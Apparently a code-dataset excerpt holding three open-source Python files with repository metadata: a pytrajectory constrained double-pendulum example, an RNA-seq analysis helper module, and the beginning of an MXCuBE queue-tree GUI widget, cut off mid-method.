| 52.594189
| 120
| 0.611594
| false
| 4.392089
| true
| false
| false
|
akunze3/pytrajectory
|
examples/ex8_ConstrainedDoublePendulum.py
|
1
|
8675
|
# constrained double pendulum
# import all we need for solving the problem
from pytrajectory import ControlSystem
import numpy as np
import sympy as sp
from sympy import cos, sin, Matrix
from numpy import pi
# to define a callable function that returns the vectorfield
# we first solve the motion equations of form Mx = B
def solve_motion_equations(M, B, state_vars=[], input_vars=[], parameters_values=dict()):
'''
Solves the motion equations given by the mass matrix and right hand side
to define a callable function for the vector field of the respective
control system.
Parameters
----------
M : sympy.Matrix
A sympy.Matrix containing sympy expressions and symbols that represents
the mass matrix of the control system.
B : sympy.Matrix
A sympy.Matrix containing sympy expressions and symbols that represents
the right hand side of the motion equations.
state_vars : list
A list with sympy.Symbols's for each state variable.
input_vars : list
A list with sympy.Symbols's for each input variable.
parameters_values : dict
A dictionary with a key:value pair for each system parameter.
Returns
-------
callable
'''
M_shape = M.shape
B_shape = B.shape
assert(M_shape[0] == B_shape[0])
# at first we create a buffer for the string that we complete and execute
# to dynamically define a function and return it
fnc_str_buffer ='''
def f(x, u):
# System variables
%s # x_str
%s # u_str
# Parameters
%s # par_str
# Sympy Common Expressions
%s # cse_str
# Vectorfield
%s # ff_str
return ff
'''
#################################
# handle system state variables #
#################################
# --> leads to x_str which shows how to unpack the state variables
x_str = ''
for var in state_vars:
x_str += '%s, '%str(var)
# finally append '= x' so that x_str unpacks the state like 'x1, x2, ..., xn = x'
x_str = x_str + '= x'
##########################
# handle input variables #
##########################
# --> leads to u_str which will show how to unpack the inputs of the control system
u_str = ''
for var in input_vars:
u_str += '%s, '%str(var)
# finally append '= u' so that u_str unpacks the inputs like:
# 'u1, u2, ... , um = u'
u_str = u_str + '= u'
############################
# handle system parameters #
############################
# --> leads to par_str
par_str = ''
for k, v in parameters_values.items():
# 'k' is the name of a system parameter such as mass or gravitational acceleration
# 'v' is its value in SI units
par_str += '%s = %s; '%(str(k), str(v))
# finally remove the trailing '; ' from par_str to avoid syntax errors
par_str = par_str[:-2]
# now solve the motion equations w.r.t. the accelerations
sol = M.solve(B)
# use SymPy's Common Subexpression Elimination
cse_list, cse_res = sp.cse(sol, symbols=sp.numbered_symbols('q'))
################################
# handle common subexpressions #
################################
# --> leads to cse_str
cse_str = ''
#cse_list = [(str(l), str(r)) for l, r in cse_list]
for cse_pair in cse_list:
cse_str += '%s = %s; '%(str(cse_pair[0]), str(cse_pair[1]))
# add result of cse
for i in xrange(M_shape[0]):
cse_str += 'q%d_dd = %s; '%(i, str(cse_res[0][i]))
cse_str = cse_str[:-2]
######################
# create vectorfield #
######################
# --> leads to ff_str
ff_str = 'ff = ['
for i in xrange(M_shape[0]):
ff_str += '%s, '%str(state_vars[2*i+1])
ff_str += 'q%s_dd, '%(i)
# remove trailing ',' and add closing brackets
ff_str = ff_str[:-2] + ']'
############################
# Create callable function #
############################
# now we can replace all placeholders in the function string buffer
fnc_str = fnc_str_buffer%(x_str, u_str, par_str, cse_str, ff_str)
# and finally execute it which will create a python function 'f'
exec(fnc_str)
# now we have defined a callable function that can be used within PyTrajectory
return f
# system and input variables
state_vars = sp.symbols('x, dx, phi1, dphi1, phi2, dphi2')
input_vars = sp.symbols('F,')
x, dx, phi1, dphi1, phi2, dphi2 = state_vars
F, = input_vars
# parameters
l1 = 0.25 # 1/2 * length of the pendulum 1
l2 = 0.25 # 1/2 * length of the pendulum
m1 = 0.1 # mass of the pendulum 1
m2 = 0.1 # mass of the pendulum 2
m = 1.0 # mass of the car
g = 9.81 # gravitational acceleration
I1 = 4.0/3.0 * m1 * l1**2 # inertia 1
I2 = 4.0/3.0 * m2 * l2**2 # inertia 2
param_values = {'l1':l1, 'l2':l2, 'm1':m1, 'm2':m2, 'm':m, 'g':g, 'I1':I1, 'I2':I2}
# mass matrix
M = Matrix([[ m+m1+m2, (m1+2*m2)*l1*cos(phi1), m2*l2*cos(phi2)],
[(m1+2*m2)*l1*cos(phi1), I1+(m1+4*m2)*l1**2, 2*m2*l1*l2*cos(phi2-phi1)],
[ m2*l2*cos(phi2), 2*m2*l1*l2*cos(phi2-phi1), I2+m2*l2**2]])
# and right hand side
B = Matrix([[ F + (m1+2*m2)*l1*sin(phi1)*dphi1**2 + m2*l2*sin(phi2)*dphi2**2 ],
[ (m1+2*m2)*g*l1*sin(phi1) + 2*m2*l1*l2*sin(phi2-phi1)*dphi2**2 ],
[ m2*g*l2*sin(phi2) + 2*m2*l1*l2*sin(phi1-phi2)*dphi1**2 ]])
f = solve_motion_equations(M, B, state_vars, input_vars)
# then we specify all boundary conditions
a = 0.0
xa = [0.0, 0.0, pi, 0.0, pi, 0.0]
b = 4.0
xb = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
ua = [0.0]
ub = [0.0]
# here we specify the constraints for the velocity of the car
con = {0 : [-1.0, 1.0],
1 : [-2.0, 2.0]}
# now we create our Trajectory object and alter some method parameters via the keyword arguments
S = ControlSystem(f, a, b, xa, xb, ua, ub, constraints=con,
eps=2e-1, su=20, kx=2, use_chains=False,
use_std_approach=False)
# time to run the iteration
x, u = S.solve()
# the following code provides an animation of the system above
# for a more detailed explanation have a look at the 'Visualisation' section in the documentation
import sys
import matplotlib as mpl
from pytrajectory.visualisation import Animation
def draw(xt, image):
x = xt[0]
phi1 = xt[2]
phi2 = xt[4]
car_width = 0.05
car_heigth = 0.02
rod_length = 2.0 * 0.25
pendulum_size = 0.015
x_car = x
y_car = 0
x_pendulum1 = x_car + rod_length * sin(phi1)
y_pendulum1 = rod_length * cos(phi1)
x_pendulum2 = x_pendulum1 + rod_length * sin(phi2)
y_pendulum2 = y_pendulum1 + rod_length * cos(phi2)
# create image
pendulum1 = mpl.patches.Circle(xy=(x_pendulum1, y_pendulum1), radius=pendulum_size, color='black')
pendulum2 = mpl.patches.Circle(xy=(x_pendulum2, y_pendulum2), radius=pendulum_size, color='black')
car = mpl.patches.Rectangle((x_car-0.5*car_width, y_car-car_heigth), car_width, car_heigth,
fill=True, facecolor='grey', linewidth=2.0)
joint = mpl.patches.Circle((x_car,0), 0.005, color='black')
rod1 = mpl.lines.Line2D([x_car,x_pendulum1], [y_car,y_pendulum1],
color='black', zorder=1, linewidth=2.0)
rod2 = mpl.lines.Line2D([x_pendulum1,x_pendulum2], [y_pendulum1,y_pendulum2],
color='black', zorder=1, linewidth=2.0)
# add the patches and lines to the image
image.patches.append(pendulum1)
image.patches.append(pendulum2)
image.patches.append(car)
image.patches.append(joint)
image.lines.append(rod1)
image.lines.append(rod2)
# and return the image
return image
if not 'no-pickle' in sys.argv:
# here we save the simulation results so we don't have to run
# the iteration again in case the following fails
S.save(fname='ex8_ConstrainedDoublePendulum.pcl')
if 'plot' in sys.argv or 'animate' in sys.argv:
# create Animation object
A = Animation(drawfnc=draw, simdata=S.sim_data,
plotsys=[(0,'$x$'),(1,'$\\dot{x}$')], plotinputs=[(0,'$u$')])
xmin = np.min(S.sim_data[1][:,0])
xmax = np.max(S.sim_data[1][:,0])
A.set_limits(xlim=(xmin - 1.0, xmax + 1.0), ylim=(-1.2,1.2))
if 'plot' in sys.argv:
A.show(t=S.b)
if 'animate' in sys.argv:
A.animate()
A.save('ex8_ConstrainedDoublePendulum.gif')
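# Typical invocations of this example script (assuming pytrajectory is installed):
#   python ex8_ConstrainedDoublePendulum.py plot       # solve, pickle the results and show the plots
#   python ex8_ConstrainedDoublePendulum.py animate    # additionally render and save the gif
#   python ex8_ConstrainedDoublePendulum.py no-pickle  # skip saving the .pcl results file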
|
bsd-3-clause
| -5,700,278,940,750,666,000
| 30.660584
| 102
| 0.566686
| false
| 3.080611
| false
| false
| false
|
phageghost/pg_tools
|
pgtools/rnatools.py
|
1
|
13893
|
import os
import itertools
import numpy
import scipy
import scipy.stats
import pandas
import seaborn
import matplotlib.pyplot as plt
from pgtools import toolbox
PSEUDO_COUNT = 1
EXPRESSION_THRESHOLD = 1
FIG_EXTS = ['pdf', 'png']
PNG_DPI = 600
def load_and_clean(datafile):
exp_data = pandas.read_csv(datafile, sep='\t', index_col=0).T
exp_data.index.name = 'Sample'
# trim sample names
new_index = []
for i in range(exp_data.shape[0]):
index_item = exp_data.index[i]
if i >= 7:
if index_item.find(' reads') > -1:
index_item = index_item[:index_item.find(' reads')]
if index_item.find('/') > -1:
index_item = index_item.split('/')[-1]
new_index.append(index_item)
exp_data.index = new_index
exp_data.columns.name = 'Entrez mRNA ID'
return exp_data
def trim_rna_file(input_filename, output_filename='', fix_names=True, transcript_to_gene=False, sep='\t'):
"""
Given the filename of a HOMER-output RNA-seq DataFrame, generate a
new file containing a new dataframe with the gene info columns (0-6)
removed. <output_filename> defaults to input_filename with "_trimmed"
appended to the filename mantissa.
If :param:`transcript_to_gene` is True, replace the refseq Transcript ID with the gene name from the annotation
"""
path, prefix, suffix = toolbox.parse_path(input_filename)
toolbox.establish_path(path)
rna_data = pandas.read_csv(input_filename, sep=sep, index_col=0)
if transcript_to_gene:
gene_names = [anno.split('|')[0] for anno in rna_data.iloc[:,6]]
rna_data.index = gene_names
rna_data = rna_data.iloc[:,7:]
# print(rna_data.columns)
if fix_names:
rna_data.columns = [col.replace('-','_').replace('.','_') for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [col.strip('/').split('/')[-1].strip() for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [(col, col.split(' FPKM')[0])[' FPKM' in col] for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [(col, col.split(' TPM')[0])[' TPM' in col] for col in rna_data.columns]
# print(rna_data.columns)
rna_data.columns = [(col, col.split(' (')[0])[' total)' in col] for col in rna_data.columns]
# print(rna_data.columns)
if not output_filename:
output_filename = os.path.join(path, '{}{}{}.{}'.format(prefix, '_trimmed', ('', '_gene_name')[transcript_to_gene], suffix))
rna_data.to_csv(output_filename, sep='\t')
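# Illustrative call (the file name is hypothetical): drops the gene-info columns, reindexes by
# gene name and, since no output name is given, writes the result next to the input with a
# "_trimmed_gene_name" suffix (assuming toolbox.parse_path splits the path into
# directory/prefix/extension as its name suggests):
#   trim_rna_file('rawCounts.txt', transcript_to_gene=True)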
def convert_rpkm_to_tpm(rpkm_data):
"""
Given a trimmed DataFrame of RNA-seq data in RPKM (with genes on rows
and samples on columns), return a new dataframe the the RPKM values
converted to transcripts per million (TPM)
"""
return rpkm_data / rpkm_data.sum(axis=0) * 1e6
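# Worked example with hypothetical numbers: a sample column holding RPKM values [10, 30]
# sums to 40, so the returned TPM values are [10/40, 30/40] * 1e6 = [250000, 750000];
# after conversion every sample column sums to exactly 1e6.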
def filter_by_type(raw_data, length_threshold=200):
"""
Retain only protein-coding transcripts and ncRNA transcripts with length >= length_threshold (lncRNA)
"""
filtered_data = raw_data.loc[:, [raw_data.loc['Annotation/Divergence'][i].split('|')[-1] == 'protein-coding'
or (raw_data.loc['Annotation/Divergence'][i].split('|')[-1] == 'ncRNA'
and raw_data.loc['Length'][i] >= length_threshold) for i in range(raw_data.shape[1])]]
print('Initial transcripts: {}'.format(raw_data.shape[1]))
print('Retaining only protein-coding and ncRNA transcripts with length >= {}'.format(length_threshold))
print('\tRemoved {} transcripts'.format(raw_data.shape[1] - filtered_data.shape[1]))
print('{} transcripts remaining'.format(filtered_data.shape[1]))
return filtered_data
def filter_by_expression_magnitude(raw_data, magnitude_threshold=1):
"""
Remove any transcripts not expressed at at least <magnitude_threshold> in one or more samples.
"""
data_rows = raw_data.index[:]
print('Initial transcripts: {}'.format(raw_data.shape[1]))
filtered_data = raw_data.loc[:,(raw_data.loc[data_rows] >= magnitude_threshold).any(axis=0)]
print('Removed {} transcripts with magnitude < {} across all samples'.format(raw_data.shape[1] - filtered_data.shape[1], magnitude_threshold))
print('{} transcripts remaining'.format(filtered_data.shape[1]))
return filtered_data
def correlated_columns(df):
"""
Since the Pandas DataFrame.corr() method has stopped working, I create my own
"""
sample_corrs = pandas.DataFrame(numpy.zeros((df.shape[1], df.shape[1])), index=df.columns, columns=df.columns)
for col1, col2 in itertools.combinations(df.columns, 2):
pcc = scipy.stats.pearsonr(df[col1], df[col2])[0]
sample_corrs.loc[col1, col2] = pcc
sample_corrs.loc[col2, col1] = pcc
for col in df.columns:
sample_corrs.loc[col, col] = 1.0
return sample_corrs
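# Minimal usage sketch (the DataFrame name is hypothetical): with samples on columns,
#   sample_corrs = correlated_columns(tpm_df)
# yields a symmetric samples-by-samples DataFrame of Pearson r with 1.0 on the diagonal.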
def scatter_rna(rna_df, dataset1, dataset2, name1='', name2='', transform=None, stat_func=None, stat_func_name='', magnitude_threshold=0, threshold_type='',
cmap='', color='r', plot_size=4, marker_size=10, marker='o', units='Log_2 TPM', density_gamma=1, output_fname_prefix='',
lims=None, ticks=None, visible_ticks=True,
coloring_sets=None,
annotations=None, annotation_padding=0.2, annotation_color='k', annotation_font_size=8,
annotation_linewidth=1, show_diagonal=False, diagonal_kwargs={}, fig=None, ax=None):
"""
Generates a scatterplot of expression values between matched sequences of expression data :dataset1: and :dataset2:
:name1: label for dataset1
:name2: label for dataset2
:transform: (optional) a function to apply to every value in each dataset prior to plotting.
:stat_func: (optional) a summary statistical function which will be passed both datasets.
:stat_func_name: (optional) the name of the resulting statistic
:magnitude_threshold: (optional) only plot data above this threshold (after transformation, if any)
:threshold_type: (optional) can be 'and' or 'or'. For 'and', exclude any points which are not above the threshold in _both_ datasets.
For 'or' exclude any points below the threshold in _either_ dataset.
:cmap: (optional) the name of a built-in matplotlib colormap to use for a density-based coloring of points. If empty, just use a plain color
:color: (optional) if :cmap: is not specified, use this single color to render the points. Defaults to red.
:plot_size: (optional) the size of each figure dimension, in inches.
:marker_size: (optional) the size of each point marker, in points. Defaults to 10.
:marker: (optional) any valid matplotlib marker style to use for the point markers. Defaults to 'o' (filled circle).
:units: (optional) the name of the resulting units of expression that will be appended to each dataset name to label the axes. Defaults to 'Log_2 TPM'
:density_gamma: (optional) the density color mapping will be raised to this power. So numbers less than 1 reduce contrast and move values to the denser
end, and values greater than 1 increase contrast and move values to the sparser end.
:output_fname_prefix: (optional). If present, save a PNG and PDF having this prefix.
:lims: (optional): force the axes to have the specified range. If not specified, use the larger of the automatically-determined axis sizes.
:ticks: (optional): a sequence of locations to place ticks on both axes.
:coloring_sets: an iterable of tuples. Each tuple should consist of a color code paired with a list of genes to which the color should be applied. Not compatible with :cmap:.
:annotations: an iterable of tuples containing (gene_name, x_offset, y_offset) where x and y offsets give the coordinate shifts for the label relative to the gene location
:show_diagonal: Whether or not to draw a line across the diagonal. Default False.
:diagonal_kwargs: Keyword arguments to pass to the plot function that draws the diagonal.
:fig: (optional) matplotlib Figure object to use.
:ax: (optional) matplotlib Axes object to use.
"""
if (fig or ax) and (not fig and ax):
raise ValueError('If passing a fig or ax object, must pass both!')
if not (fig and ax):
seaborn.set_style('white')
fig, ax = plt.subplots(1, figsize=(plot_size,plot_size))
x_data = rna_df.loc[:,dataset1]
y_data = rna_df.loc[:,dataset2]
if not name1:
name1 = dataset1
if not name2:
name2 = dataset2
if transform:
x_data = transform(x_data)
y_data = transform(y_data)
if threshold_type == 'or':
# keep only genes with > threshold expression in at least one dataset
print('Keeping only transcripts with >= {} expression in at least one dataset'.format(magnitude_threshold))
kept_genes = set(x_data[x_data >= magnitude_threshold].index).union(set(y_data[y_data >= magnitude_threshold].index))
elif threshold_type == 'and':
print('Keeping only transcripts with >= {} expression in both datasets'.format(magnitude_threshold))
# keep only genes with > threshold expression in at least one dataset
kept_genes = set(x_data[x_data >= magnitude_threshold].index).intersection(set(y_data[y_data >= magnitude_threshold].index))
elif threshold_type == '':
kept_genes = rna_df.index
else:
raise ValueError('Unknown threshold type: {}'.format(threshold_type))
x_data = x_data.loc[kept_genes]
y_data = y_data.loc[kept_genes]
print('Kept {} transcripts, discarded {}.'.format(len(kept_genes), rna_df.shape[0] - len(kept_genes)))
if stat_func:
stat_result = stat_func(x_data, y_data)
if cmap:
xy = numpy.vstack([x_data,y_data])
z = scipy.stats.gaussian_kde(xy)(xy)**density_gamma
idx = z.argsort()
x_data, y_data, z = x_data[idx], y_data[idx], z[idx]
ax.scatter(x=x_data,
y=y_data,
marker=marker, cmap=cmap, c=z, s=marker_size, edgecolor='')
else:
if coloring_sets:
remaining_genes = set(kept_genes)
for set_color, set_genes in coloring_sets:
remaining_genes = remaining_genes.difference(set_genes)
# plot the remaining genes
ax.scatter(x=x_data.loc[remaining_genes],
y=y_data.loc[remaining_genes],
marker=marker, c=color, s=marker_size, edgecolor='')
for set_color, set_genes in coloring_sets:
ax.scatter(x=x_data.loc[set_genes],
y=y_data.loc[set_genes],
marker=marker, c=set_color, s=marker_size, edgecolor='')
else:
ax.scatter(x=x_data,
y=y_data,
marker=marker, c=color, s=marker_size, edgecolor='')
if annotations:
for gene_name, x_offset, y_offset in annotations:
if gene_name in x_data.index and gene_name in y_data.index:
gene_x = x_data[gene_name]
gene_y = y_data[gene_name]
# Compute padding components using Pythogorean theorem
pointer_length = numpy.sqrt(x_offset**2 + (y_offset)**2)
if pointer_length > annotation_padding * 2:
correction_factor = annotation_padding / pointer_length
padding_x = x_offset * correction_factor
padding_y = y_offset * correction_factor
else:
padding_x = 0
padding_y = 0
text_x = gene_x + x_offset
text_y = gene_y + y_offset
ax.text(x=text_x, y=text_y, s=gene_name, fontsize=annotation_font_size)
ax.plot((gene_x+padding_x, text_x - padding_x), (gene_y + padding_y, text_y-padding_y),
color=annotation_color, linewidth=annotation_linewidth)
ax.set_xlabel('{} {}'.format(name1, units))
ax.set_ylabel('{} {}'.format(name2, units))
# make axes square
if not lims:
biggest_lim = max(ax.get_ylim()[1], ax.get_xlim()[1])
lims = (0, biggest_lim)
ax.set_xlim(*lims)
ax.set_ylim(*lims)
if ticks:
ax.set_xticks(ticks)
ax.set_yticks(ticks)
plt.setp(ax.get_xticklabels(), visible=visible_ticks)
plt.setp(ax.get_yticklabels(), visible=visible_ticks)
if show_diagonal:
ax.plot(lims, lims, **diagonal_kwargs)
if stat_func:
print('{} vs {}, {}: {:>.3}'.format(name1, name2, stat_func_name, stat_func(x_data, y_data)))
ax.text(x=(ax.get_xlim()[1] - ax.get_xlim()[0]) * 0.1 + ax.get_xlim()[0],
y=(ax.get_ylim()[1] - ax.get_ylim()[0]) * 0.9 + ax.get_ylim()[0],
s='{}: {:>.3}'.format(stat_func_name, stat_result))
if output_fname_prefix:
# toolbox.establish_path(toolbox.parse_path(output_fname_prefix)[0])
# Save plot
for fig_ext in FIG_EXTS:
figure_fname = '{}.{}'.format(output_fname_prefix, fig_ext)
print('Saving figure to {} ...'.format(figure_fname))
fig.savefig(figure_fname, bbox_inches='tight', dpi=PNG_DPI)
# Save data as CSV file
data_fname = '{}_data.csv'.format(output_fname_prefix)
print('Saving raw data to {}'.format(data_fname))
pandas.DataFrame({'{} ({})'.format(name1, units):x_data, '{} ({})'.format(name2, units):y_data}, index=x_data.index).to_csv(data_fname, index=False)
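# Sketch of a typical call, assuming tpm_df holds genes on rows and samples on columns
# (the column names and styling below are hypothetical):
#   log_tpm = numpy.log2(tpm_df + PSEUDO_COUNT)
#   scatter_rna(log_tpm, 'WT_rep1', 'KO_rep1',
#               stat_func=lambda a, b: scipy.stats.pearsonr(a, b)[0], stat_func_name='Pearson r',
#               cmap='viridis', show_diagonal=True,
#               diagonal_kwargs={'color': 'grey', 'linestyle': '--'})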
|
mit
| 1,190,259,456,043,873,800
| 45.620805
| 180
| 0.618081
| false
| 3.602956
| false
| false
| false
|
IvarsKarpics/mxcube
|
gui/bricks/TreeBrick.py
|
1
|
53816
|
# Project: MXCuBE
# https://github.com/mxcube
#
# This file is part of MXCuBE software.
#
# MXCuBE is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MXCuBE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with MXCuBE. If not, see <http://www.gnu.org/licenses/>.
# import os
import logging
# from collections import namedtuple
from gui.BaseComponents import BaseWidget
from gui.utils import queue_item, Colors, QtImport
from gui.utils.sample_changer_helper import SC_STATE_COLOR, SampleChanger
from gui.widgets.dc_tree_widget import DataCollectTree
from HardwareRepository.HardwareObjects.queue_model_enumerables import CENTRING_METHOD
from HardwareRepository import HardwareRepository as HWR
__credits__ = ["MXCuBE collaboration"]
__license__ = "LGPLv3+"
__category__ = "General"
class TreeBrick(BaseWidget):
enable_widgets = QtImport.pyqtSignal(bool)
hide_sample_tab = QtImport.pyqtSignal(bool)
hide_dc_parameters_tab = QtImport.pyqtSignal(bool)
hide_sample_centring_tab = QtImport.pyqtSignal(bool)
hide_dcg_tab = QtImport.pyqtSignal(bool)
hide_sample_changer_tab = QtImport.pyqtSignal(bool)
hide_plate_manipulator_tab = QtImport.pyqtSignal(bool)
hide_char_parameters_tab = QtImport.pyqtSignal(bool)
hide_energy_scan_tab = QtImport.pyqtSignal(bool)
hide_xrf_spectrum_tab = QtImport.pyqtSignal(bool)
hide_workflow_tab = QtImport.pyqtSignal(bool)
hide_advanced_tab = QtImport.pyqtSignal(bool)
hide_xray_imaging_tab = QtImport.pyqtSignal(bool)
populate_dc_parameter_widget = QtImport.pyqtSignal(object)
populate_dc_group_widget = QtImport.pyqtSignal(object)
populate_char_parameter_widget = QtImport.pyqtSignal(object)
populate_sample_details = QtImport.pyqtSignal(object)
populate_energy_scan_widget = QtImport.pyqtSignal(object)
populate_xrf_spectrum_widget = QtImport.pyqtSignal(object)
populate_advanced_widget = QtImport.pyqtSignal(object)
populate_xray_imaging_widget = QtImport.pyqtSignal(object)
populate_workflow_widget = QtImport.pyqtSignal(object)
selection_changed = QtImport.pyqtSignal(object)
set_directory = QtImport.pyqtSignal(str)
set_prefix = QtImport.pyqtSignal(str)
set_sample = QtImport.pyqtSignal(object)
get_tree_brick = QtImport.pyqtSignal(BaseWidget)
diffractometer_ready = QtImport.pyqtSignal(bool)
sample_mount_started = QtImport.pyqtSignal()
sample_mount_finished = QtImport.pyqtSignal()
def __init__(self, *args):
BaseWidget.__init__(self, *args)
# Hardware objects ----------------------------------------------------
self.state_machine_hwobj = None
self.redis_client_hwobj = None
# Internal variables --------------------------------------------------
self.enable_collect_conditions = {}
self.current_view = None
self.current_queue_entry = None
self.is_logged_in = False
self.lims_samples = None
self.filtered_lims_samples = None
self.compression_state = True
self.queue_autosave_action = None
self.queue_undo_action = None
self.queue_redo_action = None
self.queue_sync_action = None
# Properties ----------------------------------------------------------
self.add_property("queue", "string", "/queue")
self.add_property("queue_model", "string", "/queue-model")
self.add_property("xml_rpc_server", "string", "/xml_rpc_server")
self.add_property("redis_client", "string", "")
self.add_property("useFilterWidget", "boolean", True)
self.add_property("useSampleWidget", "boolean", True)
self.add_property("scOneName", "string", "Sample changer")
self.add_property("scTwoName", "string", "Plate")
self.add_property("usePlateNavigator", "boolean", False)
self.add_property("useHistoryView", "boolean", True)
self.add_property("useCentringMethods", "boolean", True)
self.add_property("enableQueueAutoSave", "boolean", True)
# Properties to initialize hardware objects --------------------------
self.add_property("hwobj_state_machine", "string", "")
# Signals ------------------------------------------------------------
self.define_signal("enable_widgets", ())
self.define_signal("diffractometer_ready", ())
# Hiding and showing the tabs
self.define_signal("hide_sample_tab", ())
self.define_signal("hide_dc_parameters_tab", ())
self.define_signal("hide_sample_centring_tab", ())
self.define_signal("hide_dcg_tab", ())
self.define_signal("hide_sample_changer_tab", ())
self.define_signal("hide_plate_manipulator_tab", ())
self.define_signal("hide_char_parameters_tab", ())
self.define_signal("hide_energy_scan_tab", ())
self.define_signal("hide_xrf_spectrum_tab", ())
self.define_signal("hide_workflow_tab", ())
self.define_signal("hide_advanced_tab", ())
self.define_signal("hide_xray_imaging_tab", ())
self.define_signal("populate_dc_parameter_widget", ())
self.define_signal("populate_dc_group_widget", ())
self.define_signal("populate_char_parameter_widget", ())
self.define_signal("populate_sample_details", ())
self.define_signal("populate_energy_scan_widget", ())
self.define_signal("populate_xrf_spectrum_widget", ())
self.define_signal("populate_workflow_tab", ())
self.define_signal("populate_advanced_widget", ())
self.define_signal("populate_xray_imaging_widget", ())
self.define_signal("selection_changed", ())
self.define_signal("set_directory", ())
self.define_signal("set_prefix", ())
self.define_signal("set_sample", ())
self.define_signal("get_tree_brick", ())
self.define_signal("sample_mount_started", ())
self.define_signal("sample_mount_finished", ())
# Slots ---------------------------------------------------------------
self.define_slot("logged_in", ())
self.define_slot("status_msg_changed", ())
self.define_slot("sample_load_state_changed", ())
self.define_slot("set_session", ())
self.define_slot("get_selected_samples", ())
self.define_slot("set_requested_tree_brick", ())
# Graphic elements ----------------------------------------------------
self.tools_menu = None
self.queue_sync_action = None
self.sample_changer_widget = QtImport.load_ui_file(
"sample_changer_widget_layout.ui"
)
# self.refresh_pixmap = Icons.load("Refresh2.png")
# self.sample_changer_widget.synch_button.setIcon(QtGui.QIcon(self.refresh_pixmap))
# self.sample_changer_widget.synch_button.setText("Synch ISPyB")
self.dc_tree_widget = DataCollectTree(self)
self.dc_tree_widget.selection_changed_cb = self.selection_changed_cb
self.dc_tree_widget.run_cb = self.run
# self.dc_tree_widget.clear_centred_positions_cb = \
# self.clear_centred_positions
# Layout --------------------------------------------------------------
__main_layout = QtImport.QVBoxLayout(self)
__main_layout.addWidget(self.sample_changer_widget)
__main_layout.addWidget(self.dc_tree_widget)
__main_layout.setSpacing(0)
__main_layout.setContentsMargins(0, 0, 0, 0)
# SizePolicies --------------------------------------------------------
# Qt signal/slot connections ------------------------------------------
self.sample_changer_widget.details_button.clicked.connect(
self.toggle_sample_changer_tab
)
self.sample_changer_widget.filter_cbox.activated.connect(
self.mount_mode_combo_changed
)
self.sample_changer_widget.centring_cbox.activated.connect(
self.dc_tree_widget.set_centring_method
)
self.sample_changer_widget.synch_ispyb_button.clicked.connect(
self.refresh_sample_list
)
# self.sample_changer_widget.tree_options_button.clicked.connect(\
# self.open_tree_options_dialog)
self.sample_changer_widget.filter_combo.activated.connect(
self.filter_combo_changed
)
self.sample_changer_widget.filter_ledit.textChanged.connect(
self.filter_text_changed
)
self.sample_changer_widget.sample_combo.activated.connect(
self.sample_combo_changed
)
# Other ---------------------------------------------------------------
self.enable_collect(True)
self.sample_changer_widget.synch_ispyb_button.setEnabled(False)
#self.setSizePolicy(QtImport.QSizePolicy.Maximum, QtImport.QSizePolicy.Expanding)
if HWR.beamline.sample_changer is not None:
self.connect(
HWR.beamline.sample_changer,
SampleChanger.STATE_CHANGED_EVENT,
self.sample_load_state_changed,
)
self.connect(
HWR.beamline.sample_changer,
SampleChanger.SELECTION_CHANGED_EVENT,
self.sample_selection_changed,
)
self.connect(
HWR.beamline.sample_changer,
SampleChanger.INFO_CHANGED_EVENT,
self.set_sample_pin_icon,
)
self.connect(
HWR.beamline.sample_changer,
SampleChanger.STATUS_CHANGED_EVENT,
self.sample_changer_status_changed,
)
else:
logging.getLogger("HWR").debug(
"TreeBrick: Sample changer not available."
)
if HWR.beamline.plate_manipulator is not None:
self.connect(
HWR.beamline.plate_manipulator,
SampleChanger.STATE_CHANGED_EVENT,
self.sample_load_state_changed,
)
self.connect(
HWR.beamline.plate_manipulator,
SampleChanger.INFO_CHANGED_EVENT,
self.plate_info_changed,
)
else:
logging.getLogger("GUI").debug(
"TreeBrick: plate manipulator hwobj not defined."
)
self.connect(
HWR.beamline.sample_view, "shapeCreated", self.dc_tree_widget.shape_created
)
self.connect(
HWR.beamline.sample_view,
"shapeChanged",
self.dc_tree_widget.shape_changed
)
self.connect(
HWR.beamline.sample_view, "shapeDeleted", self.dc_tree_widget.shape_deleted
)
self.connect(
HWR.beamline.sample_view,
"diffractometerReady",
self.diffractometer_ready_changed
)
self.connect(
HWR.beamline.diffractometer,
"newAutomaticCentringPoint",
self.diffractometer_automatic_centring_done,
)
self.connect(
HWR.beamline.diffractometer,
"minidiffPhaseChanged",
self.diffractometer_phase_changed,
)
self.diffractometer_phase_changed(
HWR.beamline.diffractometer.get_current_phase()
)
self.connect(
HWR.beamline.queue_manager,
"show_workflow_tab",
self.show_workflow_tab_from_model
)
self.connect(
HWR.beamline.queue_manager,
"queue_entry_execute_started",
self.queue_entry_execution_started,
)
self.connect(
HWR.beamline.queue_manager,
"queue_entry_execute_finished",
self.queue_entry_execution_finished,
)
self.connect(HWR.beamline.queue_manager, "queue_paused", self.queue_paused_handler)
self.connect(
HWR.beamline.queue_manager, "queue_execution_finished", self.queue_execution_finished
)
self.connect(HWR.beamline.queue_manager, "queue_stopped", self.queue_stop_handler)
self.connect(HWR.beamline.queue_model, "child_added", self.dc_tree_widget.add_to_view)
if hasattr(HWR.beamline, "ppu_control"):
self.connect(
HWR.beamline.ppu_control,
"ppuStatusChanged",
self.ppu_status_changed,
)
if HWR.beamline.safety_shutter is not None:
self.connect(
HWR.beamline.safety_shutter, "shutterStateChanged", self.shutter_state_changed
)
if HWR.beamline.machine_info is not None:
self.connect(
HWR.beamline.machine_info, "machineCurrentChanged", self.machine_current_changed
)
has_shutter_less = HWR.beamline.detector.has_shutterless()
if has_shutter_less:
self.dc_tree_widget.confirm_dialog.disable_dark_current_cbx()
def run(self):
"""Adds save, load and auto save menus to the menubar
Emits signals to close tabs"""
self.tools_menu = QtImport.QMenu("Queue", self)
self.tools_menu.addAction("Save", self.save_queue)
self.tools_menu.addAction("Load", self.load_queue)
self.queue_autosave_action = self.tools_menu.addAction(
"Auto save", self.queue_autosave_clicked
)
self.queue_autosave_action.setCheckable(True)
self.queue_autosave_action.setChecked(self["enableQueueAutoSave"])
